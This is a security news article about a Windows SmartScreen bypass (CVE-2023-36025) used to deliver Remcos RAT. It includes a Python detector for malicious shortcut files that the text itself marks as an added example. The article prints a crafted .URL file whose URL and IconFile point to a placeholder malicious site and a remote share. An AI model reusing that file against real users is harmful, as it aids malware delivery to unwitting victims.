Hackers Exploiting Windows SmartScreen Zero-day Flaw to Deploy Remcos RAT

May 06, 2025

Microsoft released multiple security patches as part of their Patch Tuesday, in which three zero-day vulnerabilities were also patched. One of the zero-day vulnerabilities was CVE-2023-36025, which affected the Windows SmartScreen function.

This vulnerability was given a severity rating of 8.8 (High) and was actively exploited by threat actors in the wild. It was reported as a security feature bypass that an unauthenticated threat actor can exploit, although successful exploitation requires user interaction.

Windows SmartScreen Zero-day Vulnerability

SmartScreen guards against untrusted sources, warning users about potentially malicious websites and files.

This vulnerability allows a threat actor to craft special files or hyperlinks that could bypass SmartScreen’s security warnings.

In the observed attacks, exploitation of this vulnerability involved a crafted Internet Shortcut File (.URL), which SmartScreen does not properly validate.

Exploit Code Example

A crafted file that can exploit this vulnerability can be found below:

[InternetShortcut]
URL=malicious-website.com
IDList=
IconFile=\\192.168.1.100\share\icon.ico
IconIndex=1

The URL in the file points to a malicious website, and the IconFile path can point to a network location controlled by the threat actor. With these parameters, a threat actor could download malicious payloads and execute them on vulnerable systems.
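For defenders, the two fields described above (a URL that points off-host and an IconFile that resolves to a remote UNC share) are the signals worth checking in mail gateways or endpoint scans. The following Python is an added example written for this article, not code from the original page or from Microsoft; it parses a .URL file as the INI-style format it is and reports the indicators the article and the quoted tweet describe (UNC IconFile paths, file:// URLs to remote hosts, and remote targets that are mountable containers such as .zip or .vhd). The sample contents, host addresses and the MOUNTABLE_EXTS list are constructed assumptions for the demonstration.

```python
import configparser
import re
from urllib.parse import urlparse

# Container types named in the quoted tweet; Windows mounts them on open.
# Constructed list for this example, not an official Microsoft list.
MOUNTABLE_EXTS = (".zip", ".vhd", ".vhdx", ".iso")

# Constructed sample resembling the article's crafted file (documentation
# addresses from RFC 5737, not real infrastructure).
SAMPLE_URL_FILE = r"""[InternetShortcut]
URL=file://192.0.2.10/share/archive.vhd
IconFile=\\192.0.2.10\share\icon.ico
IconIndex=1
"""

# The article's own example, reconstructed with its placeholder values.
PAGE_SAMPLE = r"""[InternetShortcut]
URL=malicious-website.com
IDList=
IconFile=\\192.168.1.100\share\icon.ico
IconIndex=1
"""

# A benign shortcut for comparison.
BENIGN_URL_FILE = """[InternetShortcut]
URL=https://example.com/
"""

# \\host\share... : a UNC path that will trigger an outbound SMB connection
UNC_RE = re.compile(r"^\\\\[^\\]+\\")


def parse_url_shortcut(text):
    """Return the [InternetShortcut] fields as a dict with lowercase keys.

    Returns an empty dict for anything that is not a parseable .URL file,
    so callers can treat 'unparseable' the same as 'nothing to report'.
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   delimiters=("=",))
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    if not cp.has_section("InternetShortcut"):
        return {}
    return {k.lower(): v.strip() for k, v in cp.items("InternetShortcut")}


def analyze_url_shortcut(text):
    """List human-readable findings for the remote-resource indicators."""
    fields = parse_url_shortcut(text)
    findings = []
    url = fields.get("url", "")
    icon = fields.get("iconfile", "")

    # IconFile on a remote share: the shell fetches the icon over SMB
    # merely to render the file, before any user click.
    if UNC_RE.match(icon):
        findings.append("IconFile references a remote UNC path: " + icon)

    # URL given as a UNC path rather than an http(s) link.
    if UNC_RE.match(url):
        findings.append("URL references a remote UNC path: " + url)

    # file:// with a host component points at a remote SMB target.
    parsed = urlparse(url)
    if parsed.scheme.lower() == "file" and parsed.netloc:
        findings.append("URL is a file:// link to a remote host: " + parsed.netloc)
        if parsed.path.lower().endswith(MOUNTABLE_EXTS):
            findings.append("remote file target is a mountable container: " + parsed.path)

    return findings


def is_suspicious(text):
    """True when at least one remote-resource indicator is present."""
    return bool(analyze_url_shortcut(text))


if __name__ == "__main__":
    for name, sample in (("sample", SAMPLE_URL_FILE),
                         ("page example", PAGE_SAMPLE),
                         ("benign", BENIGN_URL_FILE)):
        print(name, "->", analyze_url_shortcut(sample) or "no findings")
```

The check is deliberately narrow: a .URL file whose icon or target lives on a remote host is unusual for legitimate shortcuts, so each finding is a reviewable signal rather than a verdict, and the same parsing can be pointed at attachments or downloaded files before they reach a user's desktop.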

#TA544 back using #Remcos after using #SystemBC briefly last week. Unique page,link URLs redir to .url file with file://.zip/.vhd SMB target abusing CVE-2023-36025 so it will mount the VHD by just opening the .URL. Exe using #DOILoader #IDATLoader w. local payload. cc @wdormann pic.twitter.com/Z7vXWUZ1ZV

— Tommy M (TheAnalyst) (@ffforward) November 20, 2023

The initial delivery of this malicious file could be through phishing emails or compromised websites. If the user downloads and opens the malicious Internet Shortcut file, the payload is executed, giving the threat actor access to the system.

A complete proof of concept for this vulnerability has been published, providing detailed information on the source code, the method, and related details.

Source: CybersecurityNews.com
